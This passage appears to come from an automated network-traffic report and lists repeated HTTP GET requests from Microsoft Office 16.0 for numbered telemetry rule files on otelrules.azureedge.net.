                    Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
                    Source: global trafficHTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
